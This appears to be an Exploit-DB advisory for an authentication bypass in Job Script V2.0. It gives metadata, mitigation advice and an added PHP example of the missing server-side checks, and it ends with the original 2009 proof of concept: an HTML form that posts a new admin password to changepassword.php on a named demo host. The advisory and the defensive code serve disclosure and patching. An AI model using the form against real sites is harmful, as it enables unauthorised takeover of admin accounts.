Vendor: Job Script V2.0
By: TiGeR-dZ
CVSS: 7.5 (HIGH)
Type: Authentication Bypass
CWE: 287
Product Name: Job Script V2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Job Script V2.0 – Job Board Software change password admin

Job Script V2.0 is vulnerable to an authentication bypass that lets an attacker gain access to the admin panel without authenticating. The cause is a missing authentication check in the changepassword.php script: an attacker can exploit it by sending a POST request to changepassword.php with a valid username and no password.

Mitigation:

Upgrade to the latest version of Job Script V2.0 or apply the patch provided by the vendor.
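
The server-side checks whose absence is described above, as an added example (not the vendor's code or patch). The function name, the session keys and the `csrf_token` and `current_password` fields are assumptions; only the `password` field name comes from the form on this page.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical guard for admin/changepassword.php (assumed names throughout).
 * Returns [HTTP status, new password hash or null].
 */
function handle_password_change(string $method, array $session, array $post, string $storedHash): array
{
    if ($method !== 'POST') {
        return [405, null];
    }
    // 1. The check the advisory says is missing: an authenticated admin session.
    if (empty($session['admin_id'])) {
        return [401, null];
    }
    // 2. CSRF token bound to the session, so a form hosted elsewhere cannot drive the change.
    $token = $post['csrf_token'] ?? '';
    if (!is_string($token) || empty($session['csrf_token'])
        || !hash_equals($session['csrf_token'], $token)) {
        return [403, null];
    }
    // 3. Re-authenticate: require the current password before replacing it.
    $current = $post['current_password'] ?? '';
    if (!is_string($current) || !password_verify($current, $storedHash)) {
        return [403, null];
    }
    // 4. Minimal length policy for the new password; store only a hash.
    $new = $post['password'] ?? '';
    if (!is_string($new) || strlen($new) < 12) {
        return [422, null];
    }
    return [200, password_hash($new, PASSWORD_DEFAULT)];
}

// Constructed sample data, not taken from the application.
$stored  = password_hash('old-admin-password', PASSWORD_DEFAULT);
$session = ['admin_id' => 1, 'csrf_token' => bin2hex(random_bytes(16))];

// Request shaped like the form on this page: only "password", no session.
[$status] = handle_password_change('POST', [], ['password' => 'x'], $stored);
echo "unauthenticated request: $status\n";

// Change requested by a logged-in admin who supplies token and current password.
[$status, $hash] = handle_password_change('POST', $session, [
    'csrf_token'       => $session['csrf_token'],
    'current_password' => 'old-admin-password',
    'password'         => 'a-much-longer-new-password',
], $stored);
echo "authenticated request: $status\n";
```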

Exploit-DB raw data:

<head>
    <title>Job Script V2.0 - Job Board Software change pasword admin </title>
 
</head>
    </head>

<body>




<div id="page">
   
      <div id="middle">
          <div class="center">
 
<table width=100% cellspacing=15>
<tr>
    <td width="223"><b>admin :</b></td><td>admin@admin.com</td>
</tr>
</table>

<body>




<div id="page">
   
      <div id="middle">
          <div class="center">
 
<table width=100% cellspacing=15>
<tr><td valign=top>


<b><i>Change password</i></b><br />
<br />





<form action=http://www.jobscriptdemo.com/admin/changepassword.php METHOD=POST>
<input type=password name=password>

<input type=submit name=submit value="Change Password">
</form>
 
</td>
</tr>
</table>





          </div>
     </div>
     <div class="clear"></div>
     
     
</div>
</body>
</html>
     






          <p>&nbsp;<p><font size="5">Cod[3]d By:TiGeR-dZ</font></div>
     </div>
     <div class="clear"></div>
     
     
</div>
<p><font size="5"> ;Script:<font color="#FF0000">Job Script V2.0 - Job Board Software</font></font></p>
<p><font size="5">Download</font><font size="5">:</font><a href="http://www.jobscript.net/job-board-software/"><font size="5">http://www.jobscript.net/job-board-software/</font></a></p>
<p><font size="5">Mail:<font color="#FF0000">Tiger-dz@live.com</font></font></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>

# milw0rm.com [2009-05-07]